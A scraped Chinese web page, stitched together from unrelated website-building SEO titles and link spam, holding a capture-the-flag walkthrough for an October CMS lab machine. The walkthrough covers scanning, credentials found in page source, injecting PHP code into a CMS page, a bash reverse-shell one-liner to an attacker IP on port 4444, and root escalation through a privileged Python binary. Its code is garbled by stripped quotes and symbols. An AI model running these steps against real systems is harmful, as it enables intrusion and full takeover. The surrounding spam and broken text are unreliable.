当前位置: 首页 > news >正文

博物馆网站建设必要网站建设添加文件夹在哪

博物馆网站建设必要,网站建设添加文件夹在哪,眉县网站建设,当当网网站建设案例环境准备 靶机链接#xff1a;百度网盘 请输入提取码 提取码#xff1a;3e4s 虚拟机网络链接模式#xff1a;桥接模式 攻击机系统#xff1a;kali linux 2021.1 信息收集 1.探测目标靶机ip。 2.探测靶机开放端口和服务情况。 漏洞探测 1.访问网页 2.用dirsearch扫描… 环境准备 靶机链接百度网盘 请输入提取码 提取码3e4s 虚拟机网络链接模式桥接模式 攻击机系统kali linux 2021.1 信息收集 1.探测目标靶机ip。 2.探测靶机开放端口和服务情况。 漏洞探测 1.访问网页 2.用dirsearch扫描目录 dirsearch -u 192.168.1.101 3.访问目录是一个登录界面 4.查看下8080端口的源码发现一个超链接信息 5.访问这个信息发现用户名密码 user - admin password - adminadmin2 6.成功登录第三步的登录界面 漏洞利用 1.谷歌下发现这个October十月是一个用php语言搭建的cms 2.上传不了文件 3.虽然不能上传文件但可以添加一个网页 4.保存之后点击preview ; 发现报错位置在右下角的code,这应该要php代码 5.直接谷歌 october cms code reverse shell 6.直接将查到的信息粘贴进code里 function onStart() { echo 123; } 7.再点击preview后没有报错说明成功添加了一个网页 8.这次直接把code下面换成反弹shell的php代码用exech函数来执行 function onStart() { echo exec(bash -c bash -i /dev/tcp/192.168.1.106/4444 01); } 权限提升 1.开启监听后点击preview即可回弹shell 2.发现python3.7有root权限 3.直接提权成功拿下 /usr/bin/python3.7 -c import os; os.execl(/bin/sh, sh, -p)
http://www.hkea.cn/news/14275246/

相关文章:

  • 新版织梦腾讯3366小游戏门户网站模板源码网页模板的扩展名
  • 庆阳做网站的公司做seo网站推广价格
  • wordpress基础开发教程余姚seo智能优化
  • 网站建设的swot分析品牌网站建设公司有哪些
  • 住房和城乡建设厅安全员证不错宁波seo公司
  • 教做高级料理的网站山东青岛网站设计公司
  • 济南地产行业网站开发企业网站建设立项报告
  • 河北建设工程网站青岛平面设计公司
  • 安阳网站建设官网苏州网站建设在哪里
  • 微网站建设比较全面的是推广引流工具
  • 昆明网站设计制作公司淮南教育网官网
  • 青岛高端网站设计公司搞笑幽默网站源码最新
  • 少儿教育网站建设价格百度为什么会k网站
  • seo整站优化外包公司域名网站平台
  • 如何打开用wordpress优化推广网站
  • 用域名建设网站网站开发 技术指标
  • 天津网站建设揭秘wordpress 浮动 插件
  • 外贸网站推广怎么做做网站把自己做死
  • 即墨网站制作网页制作及欣赏
  • 微信商城网站搭建中国网站建设市场分析
  • 建设网站要求上海搬家公司排名前十名电话
  • 怎么制作私人网站教程天津搜索引擎推广
  • 网站主页设计2017自己做网站的趋势
  • 免费做app网站建设衡阳企业网站排名优化
  • 有域名怎么建设网站搜索引擎分析论文
  • 备案网站名称修改网站备案成功怎么查备案号
  • 西安市未央区建设局官方网站网页微博怎么下载视频
  • 网站免费做app小程序大概需要多少钱
  • 做餐饮培训网站广告佛山网站建设外贸
  • 哪个网站专门做二手的制作企业网页